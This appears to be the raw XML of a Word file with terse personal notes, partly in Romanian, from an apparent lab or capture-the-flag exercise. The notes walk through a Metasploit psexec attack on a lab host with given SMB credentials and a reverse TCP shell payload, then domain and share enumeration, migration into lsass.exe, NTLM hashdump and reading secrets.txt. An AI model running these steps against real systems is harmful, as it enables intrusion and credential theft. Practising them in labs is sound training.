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5E831" w14:textId="131A7F9E" w:rsidR="00FA24B1" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7ACB6F" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="389F15C2" w14:textId="28F46BB9" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696922DF" w14:textId="71EFA7B7" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AB1FA" w14:textId="76850FA0" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0BB0C" w14:textId="629D0100" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Db_nmap -sT -p- -sV 10.10.222.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199F387" w14:textId="48D18414" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>445 open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BDC24F" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="360434C3" w14:textId="6EACD0AB" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Use exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFD42C" w14:textId="6151E3EE" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5FDA88" w14:textId="2B87B197" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Set lhost &lt;own ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FCB68" w14:textId="0EBC5737" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Set rhosts 10.10.222.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17195978" w14:textId="2566D613" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Set smbpass Password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1F577" w14:textId="5E2B8852" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Set smbuser ballen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DACE89" w14:textId="4939D911" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Set payload windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD47138" w14:textId="451EC539" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674A0DC" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="5116D4E5" w14:textId="0729370E" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52146B7E" w14:textId="7312CD71" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A816A" w14:textId="54B7A27D" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60411E2A" w14:textId="41E2E13A" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Sessions -u &lt;id session&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2ECDC8" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="2A030104" w14:textId="24257F18" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Sessions -i &lt;new session id&gt; --timeout 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5BAD3D" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="5DB9C970" w14:textId="49AB9086" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Sysinfo – pentru computer name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49331437" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="2CFEE5E5" w14:textId="2DFAD9F1" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Pentru domain name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C3171" w14:textId="3152AD20" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2191C0B9" w14:textId="7F79D9CA" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:t>Sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F933488" w14:textId="65F162E3" w:rsidR="00FC011A" w:rsidRDefault="00FC011A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use post/windows/gather/enume_domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266FF325" w14:textId="5823077F" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Set session &lt;meterpreter id session&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB6EC3" w14:textId="614C4E97" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6036D0" w14:textId="77777777" w:rsidR="000A0A76" w:rsidRDefault="000A0A76"/>
    <w:p w14:paraId="2B8E6155" w14:textId="69756064" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Pentru share name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B723BFE" w14:textId="181CB0F2" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Use /post/windows/gather/enum_shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B112B" w14:textId="23EB4A7F" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Set session &lt;meterpreter id session&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC6C1C" w14:textId="504E4466" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07995660" w14:textId="77777777" w:rsidR="000A0A76" w:rsidRDefault="000A0A76"/>
    <w:p w14:paraId="35540742" w14:textId="558502CB" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>NTLM hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC2F6C" w14:textId="2816789A" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Sessions -i &lt;meterpreter id session&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC8798F" w14:textId="7790A199" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8CA14" w14:textId="62FAAEAF" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A8504" w14:textId="090F7694" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Se migreaz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>ă</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la pid gasit la pid lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61473500" w14:textId="5B06072F" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Migrate 760</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2D7AA" w14:textId="505C73F2" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B374405" w14:textId="1763E850" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B55950" w14:textId="77777777" w:rsidR="000A0A76" w:rsidRDefault="000A0A76"/>
    <w:p w14:paraId="560C4B21" w14:textId="4C9AAC05" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Search hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21197E99" w14:textId="77777777" w:rsidR="000A0A76" w:rsidRDefault="000A0A76"/>
    <w:p w14:paraId="0A8BCF82" w14:textId="53036808" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Where is file secrets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBFDDB9" w14:textId="69F521A7" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Meterpreter&gt; search -f secrets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BC6A71" w14:textId="1FBA481B" w:rsidR="000A0A76" w:rsidRDefault="000A0A76">
      <w:r>
        <w:t>Cat “path\to\secrets.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D2B12" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="1C607F2B" w14:textId="77777777" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:p w14:paraId="15E012F7" w14:textId="192525C1" w:rsidR="00FC011A" w:rsidRDefault="00FC011A"/>
    <w:sectPr w:rsidR="00FC0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A8"/>
    <w:rsid w:val="000A0A76"/>
    <w:rsid w:val="003206CD"/>
    <w:rsid w:val="003E28F2"/>
    <w:rsid w:val="00694B81"/>
    <w:rsid w:val="00D7288B"/>
    <w:rsid w:val="00F932A8"/>
    <w:rsid w:val="00FA24B1"/>
    <w:rsid w:val="00FC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3EF2A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2144AF38-3AAC-42D4-81D4-315DEB4F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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-28T15:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-28T15:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>